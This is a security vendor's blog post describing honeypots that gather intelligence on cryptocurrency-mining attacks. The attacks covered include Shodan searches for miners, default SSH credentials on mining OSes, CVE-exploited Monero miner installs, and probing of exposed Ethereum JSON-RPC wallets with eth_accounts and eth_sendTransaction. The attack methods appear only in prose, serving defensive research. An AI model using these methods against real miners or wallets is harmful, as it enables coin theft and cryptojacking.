Cryptocurrency Mining Hacks: How Thefts Steal Bitcoin and Ethereum
Over the last year, cryptocurrency broke into mainstream with its dramatic highs and lows. With ever increasing buzz about cryptocurrency, various attack methods for crypto thefts have emerged, especially because it is much easier to transfer funds with anonymity compared to conventional methods, like a fraudulent bank transfer, which can quickly be reverted or blocked as well as backtracked.
Attackers are not limiting themselves in a single way as we are observing attacks on mining hardware, software, wallets as well as system of owners who can be a potential candidate for a forced miner installation. To track each class of threats, NewSky Halo offers a bouquet of four CryptoIntelligence gathering solutions, namely Albana, Barbera, Cortese and Durella.
Albana — Threat tracking via Halo CryptoMiner Holograms
One of the common challenges between crypto mining machines and IoT devices is a lack of standardization, which leads to a highly diverse set of architectures. Although creating a honeypot by owning every known mining machine is possible, it is not viable because of
(1). A large number of devices are already present.
(2). New mining machines are regularly added to the market.
Miner attackers in most cases will not have a physical access to the victim’s device, and all they depend on is communication to the mining machine remotely via internet. Here miner deception comes to our rescue. If a deceptive model replies to the attacker’s requests in the same way as a physical machine, it will be treated as a physical miner machine by the attackers, luring them to launch attacks which helps Halo gather threat intelligence.
With Halo’s modular miner deception platform, Albana, we already have emulated most of the known mining machines and keep adding new ones to the list. These mining machine holograms are exposed to the internet and hence their IPs are also reflected on popular services, like Shodan. Attackers often use brute forcing or intelligent Shodan searches a.k.a “Shodan dorks” to get a list of the mining devices for launching an attack. Our deception honeypots also get pulled up on such IP lists of potentially vulnerable mining machines. Consequently, if an attacker tries to launch a targeted attack on a specific mining machine vendor, we receive those attacks in real time. Given below are two images, the top one is a validation window of a physical device while the bottom one is a HALO deception hologram of the same Antminer, emulating the same validation window in the front end, and port configuration and network behavior at the back end.
Barbera — Trapping attacks on customized cryptomining based operating system/software
With an increasing number of people being involved with cryptomining, mining with a usual setup like Windows OS on a laptop might not be profitable. Hence many users are shifting towards dedicated mining-based operating systems that are designed solely to optimize cryptomining. Such mining operating systems are often on the radar of attackers as it is clear that a successful hack of these operating systems means an instant crypto theft. One of such popular operating systems is ethOS, whose default SSH credentials were abused by attackers to take over their mining equipment.
With Halo’s customized protocol honeypot, Barbera, attacks on cryptomining operating systems are captured in real time, eliminating the noise of other SSH/telnet attacks focused on non-crypto threats for a concentrated feed of cryptomining OS. A global blacklist of all these cryptomining offenders’ IPs is maintained at Halo’s centralized database which can be queried for different mining operating systems.
Besides intelligence gathered for mining operating systems, NewSky Security periodically audits mining OS to release advisories for proper usage of mining equipment. This information is made public so that people do not fall into mining traps, like mining for someone else. We recently observed that several users are mining not for themselves but for a different user due to a configuration issue. We named it “StartWallet”.
Cortese — Tracking campaigns that deploy exploits to install crypto mining malware
An alternative approach to hacking mining equipment is to hack systems of end users, and then install mining malware on them so that they keep mining cryptocurrency while the system’s owner is unaware of it. To take control of these devices, attackers often resort to publicly available exploits which are often cross platform for a wide range. Once they succeed in their exploitation attempts, a miner is introduced. While Halo exploit honeypots capture a variety of Windows/Linux/IoT exploit attacks, our automated classifier, Cortese, identifies if the end-game of an exploit campaign is to install a crypto mining malware. Halo’s centralized server stores such cryptojacking data, which can be queried by Halo’s users.
In the image below, we observed a Monero miner malware employed by CVE-2017–10271 campaign which was attacking Halo Exploit honeypot.
Similarly, we are tracking the infamous DrupalGeddon2 CVE-2018–7600 attacks from day one. In many of the cases, DrupalGeddon2 exploitation is leading to a Monero Miner payload.
Durella — Crypto Wallet Deception
Some cryptocurrency attacks may not be hardware or vendor specific as attackers’ end game is to directly aim access for a cryptocurrency wallet and then transfer coins into their own wallet. For example, Ethereum supports JSON remote procedure calls for various activities which is naturally meant to be used by localhost i.e. by the owner of the system on which it is installed.
However, if the system is exposed to the internet without proper firewalls or authentications, the JSON call can be done by an external IP. So, an attacker can scan all internet IPs to find out if there are just Ethereum wallets with JSON RPC exposed. For example, Halo honeypots often observe a recon activity by attack IPs who send commands like “eth_accounts” to evaluate if the IP is an exposed wallet which they can hack into.
Halo deception honeypot, Durella, is designed to give positive responses of such recon queries. For example, if an attacker issues POST eth_accounts method to Durella, Durella returns a valid Ethereum address, hence deceiving itself to be an exposed wallet. Due to the positive response of such activity, attackers try further methods like eth_sendTransaction, which also exposes the attackers’ crypto address to Durella.
Conclusion
While there are several honeypot methodologies in the wild, they capture a myriad of attacks and it is difficult to find the needle (Crypto Threat attacks) from the haystack (all Windows, Linux, IoT attacks).
Halo CryptoIntelligence bouquet (Albana, Barbera, Cortese and Durella) handle this challenge by creating a targeted feed of CryptoThreat attack IPs, the methods used to hack into mining hardware/software/wallets, the wallet addresses of attackers, and the large-scale campaigns which employ mining malware.
Ankit Anubhav, Principal Researcher, NewSky Security (NewSky Security)
